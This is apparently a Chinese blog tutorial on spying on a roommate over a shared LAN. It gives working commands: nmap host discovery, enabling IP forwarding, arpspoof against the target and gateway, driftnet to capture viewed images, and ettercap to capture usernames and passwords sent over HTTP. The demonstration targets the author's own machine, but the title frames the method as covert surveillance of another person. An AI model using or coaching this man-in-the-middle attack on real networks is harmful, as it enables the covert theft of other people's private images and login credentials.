Ettercap嗅探室友浏览的图片和账号密码

Ettercap嗅探室友浏览的图片和账号密码_第1张图片

一,介绍

本次实验介绍利用arp棋牌,搭配Ettercap嗅探目标IP正在浏览的图片,以及输入的账号密码。

ettercap:最初设计为交换网上的sniffer,但是随着发展,它获得了越来越多的功能,成为一款有效的、灵活的中介攻击工具。它支持主动及被动的协议解析并包含了许多网络和主机特性(如OS指纹等)分析,总之可以简单理解为可以抓取数据包。driftnet :一款简单的图片捕获工具,可以很方便的在网络数据包中抓取图片。

二,Ettercap基础语法

-T 文本模式
-G 图形模式
-D 守护进程
-M中间人
-B双网卡之间进行欺骗
-M arp
-M icmpMAC/IP)
-M dhcpip_pool/netmask/dns)
-r 读取本地文件
-w 将嗅探数据保存到本地
ettercap -Tq -i eth0    //这条命令表示监控eth0网卡的流量
driftnet -i wlan0    //捕获经过eth0的图片并显示
-i 网卡,后接网卡名

三,实验复现

一,首先扫描局域网所有的ip:
输入ifconfig获取自己的网卡和ip信息
Ettercap嗅探室友浏览的图片和账号密码_第2张图片
用nmap探测局域网下的主机
命令:
nmap -sP 192.168.1.0/24 //-sP后面根据自己网络填网段
Ettercap嗅探室友浏览的图片和账号密码_第3张图片
本机IP:192.168.1.106
这里我们用本机作为目标进行嗅探。

二,Arp欺骗目标主机:

注意:linux中默认不开启IP转发不转发的话目标机就没网,我们去手动开启他,去修改配置文件/proc/sys/net/ipv4的ip_forward中,默认为0(不转发),我们修改成1。
输入:

echo 1 >/proc/sys/net/ipv4/ip_forward    //这句意思是向这个文件写入1

设置回来:echo 0 >/proc/sys/net/ipv4/ip_forward
设置arp转发
接着我们输入:

arpspoof -i eth0 -t 192.168.1.106 192.168.1.1   //-i后面是网卡,-t 后面填目标ip  最后的填网关

ARP欺骗中
我们开启了ip转发,目标ip不会断网。

三,用driftnet捕获图形
重新打开一个终端输入:

driftnet -i eth0   //这句话的意思是捕获eth0上的数据

Ettercap嗅探室友浏览的图片和账号密码_第4张图片
driftnet弹出了一个窗口,是显示捕获的图片用的,我们用当前电脑去看看图片。
Ettercap嗅探室友浏览的图片和账号密码_第5张图片
我们去qq空间看了一下照片,我们现在去看看kali。
Ettercap嗅探室友浏览的图片和账号密码_第6张图片
我们可以看到已经成功捕获到。
我们关掉driftnet窗口,留下arp欺骗终端我们去测试账号密码获取。

四,ettercap获取账号密码

重新打开一个终端输入:

ettercap -Tq -i eth0

Ettercap嗅探室友浏览的图片和账号密码_第7张图片
我们找一个http(https有防劫持)的网站去注册一个号
注册检测
我们去kali看看
Ettercap嗅探室友浏览的图片和账号密码_第8张图片
已经成功嗅探到了我们刚刚注册的号的信息

四,实验结束

教程到此结束,有疑惑的话可以在论坛留言,或者进入QQ群讨论

你可能感兴趣的:(KALI渗透,Kali,Linux,渗透测试,Kali,Linux,渗透测试,backtrack,黑客,黑客,黑客教程,入侵,入侵网站,网络嗅探器,音视频嗅探,源代码嗅探)